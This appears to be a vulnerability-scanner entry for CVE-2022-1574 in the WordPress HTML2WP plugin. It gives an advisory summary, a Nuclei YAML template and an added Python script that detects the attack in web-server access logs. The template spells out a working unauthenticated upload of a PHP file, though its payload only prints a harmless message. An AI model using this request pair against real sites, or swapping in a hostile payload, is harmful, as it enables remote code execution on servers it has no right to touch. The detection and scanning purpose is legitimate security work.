WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
ID: CVE-2022-1574
Severity: critical
Author: theamanrawat
Tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project
Description
WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
YAML Source
id: CVE-2022-1574

info:
  name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
  impact: |
    An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
  remediation: |
    Update to the latest version of the plugin or remove it if not needed.
  reference:
    - https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
    - https://wordpress.org/plugins/html2wp/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1574
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1574
    cwe-id: CWE-352
    epss-score: 0.05961
    epss-percentile: 0.93455
    cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: html2wp_project
    product: html2wp
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 253
        Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
        Connection: close

        -----------------------------7816508136577551742878603990
        Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
        Content-Type: text/html

        <?php

        echo "File Upload success";

        -----------------------------7816508136577551742878603990--
      - |
        GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 302"
          - "status_code_2 == 200"
          - "contains(body_2, 'File Upload success')"
        condition: and
# digest: 4b0a00483046022100d8e50593f5e87861875794546a9b417328ac9385f97c734c58827d7360e0ff65022100fc07d8c7b8f4025a5c2d6d12c5f952fa5a6ba3a1d77ed28c65423874abe14ab0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1574.yaml"
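
The request pair in the template (an import POST to the settings page, then a fetch of a script under the plugin's upload directory) also leaves a trace in the web server access log. The following is an added example, not part of the template or the Nuclei project: it assumes combined-format access logs, and the function names, the extension list and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_DIR = "/wp-content/uploads/html2wp/"             # path from the template's GET request
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)  # assumption: extensions the server executes


def parse(line):
    """Split one access-log line into (ip, method, path, query, status), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    return ip, method.upper(), url.path, parse_qs(url.query), int(status)


def find_html2wp_abuse(lines):
    """Flag served scripts under the html2wp upload dir and link them to earlier import POSTs."""
    importers = {}  # client ip -> line number of its most recent import POST
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse(line)
        if rec is None:
            continue
        ip, method, path, query, status = rec
        if (method == "POST" and path.endswith("/wp-admin/admin.php")
                and query.get("page") == ["html2wp-settings"]):
            importers[ip] = n
        elif UPLOAD_DIR in path and EXEC_EXT.search(path) and status == 200:
            findings.append({"line": n, "ip": ip, "path": path,
                             "import_post_line": importers.get(ip)})
    return findings


# Constructed sample log lines (documentation addresses, made-up file names).
SAMPLE = [
    '198.51.100.7 - - [10/May/2022:10:00:01 +0000] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 302 0 "-" "-"',
    '198.51.100.7 - - [10/May/2022:10:00:02 +0000] "GET /wp-content/uploads/html2wp/a1b2c3.php HTTP/1.1" 200 19 "-" "-"',
    '203.0.113.9 - - [10/May/2022:10:05:00 +0000] "GET /wp-content/uploads/html2wp/index.html HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [10/May/2022:10:06:00 +0000] "GET /wp-content/uploads/html2wp/old.PHP HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_html2wp_abuse(SAMPLE):
        print(finding)
```

A finding whose `import_post_line` is `None` still deserves review: the upload may have come from a different address or from before the log window.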